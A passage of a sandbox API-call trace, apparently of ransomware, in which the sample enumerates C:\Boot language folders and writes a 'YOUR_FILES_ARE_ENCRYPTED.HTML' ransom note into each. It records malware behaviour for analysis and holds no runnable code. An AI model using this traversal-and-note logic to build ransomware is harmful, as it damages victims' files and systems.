ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.182] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.182] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.182] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0155.183] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.183] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.183] lstrlenW (lpString=".mui") returned 4 [0155.183] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.183] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.183] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.183] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.183] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ru-ru\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.183] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.185] CloseHandle (hObject=0x4a4) returned 1 [0155.186] GetProcessHeap () returned 0x270000 [0155.186] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.186] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0155.186] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0155.186] GetProcessHeap () returned 0x270000 [0155.186] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.187] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\sv-SE" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE") returned="\\\\?\\C:\\Boot\\sv-SE" [0155.187] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sv-SE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\*") returned="\\\\?\\C:\\Boot\\sv-SE\\*" [0155.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.188] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.188] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.188] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0155.188] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.188] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.188] lstrlenW (lpString=".mui") returned 4 [0155.188] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.188] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.188] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.188] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.188] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\sv-se\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.188] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.190] CloseHandle (hObject=0x4a4) returned 1 [0155.191] GetProcessHeap () returned 0x270000 [0155.191] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.191] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0155.191] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0155.191] GetProcessHeap () returned 0x270000 [0155.191] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.191] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\tr-TR" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR") returned="\\\\?\\C:\\Boot\\tr-TR" [0155.192] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\tr-TR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\*") returned="\\\\?\\C:\\Boot\\tr-TR\\*" [0155.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.192] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.192] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.192] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0155.192] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.192] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.192] lstrlenW (lpString=".mui") returned 4 [0155.192] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.192] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.192] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.192] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.192] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\tr-tr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.193] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.195] CloseHandle (hObject=0x4a4) returned 1 [0155.195] GetProcessHeap () returned 0x270000 [0155.196] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.196] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0155.196] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0155.196] GetProcessHeap () returned 0x270000 [0155.196] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.196] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\zh-CN" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN") returned="\\\\?\\C:\\Boot\\zh-CN" [0155.196] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-CN", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\*") returned="\\\\?\\C:\\Boot\\zh-CN\\*" [0155.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.197] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.197] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.197] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0155.197] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.197] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.197] lstrlenW (lpString=".mui") returned 4 [0155.197] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.197] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.197] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.197] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.197] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\zh-cn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.198] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.200] CloseHandle (hObject=0x4a4) returned 1 [0155.200] GetProcessHeap () returned 0x270000 [0155.201] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.201] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0155.201] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0155.201] GetProcessHeap () returned 0x270000 [0155.201] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.201] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\zh-HK" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK") returned="\\\\?\\C:\\Boot\\zh-HK" [0155.201] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-HK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\*") returned="\\\\?\\C:\\Boot\\zh-HK\\*" [0155.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.201] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.201] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.201] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0155.202] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.202] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.202] lstrlenW (lpString=".mui") returned 4 [0155.202] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.202] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.202] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.202] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.202] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\zh-hk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.202] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.204] CloseHandle (hObject=0x4a4) returned 1 [0155.205] GetProcessHeap () returned 0x270000 [0155.205] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.205] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0155.205] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0155.205] GetProcessHeap () returned 0x270000 [0155.205] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.205] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\zh-TW" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW") returned="\\\\?\\C:\\Boot\\zh-TW" [0155.205] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-TW", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\*") returned="\\\\?\\C:\\Boot\\zh-TW\\*" [0155.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.206] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.206] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, 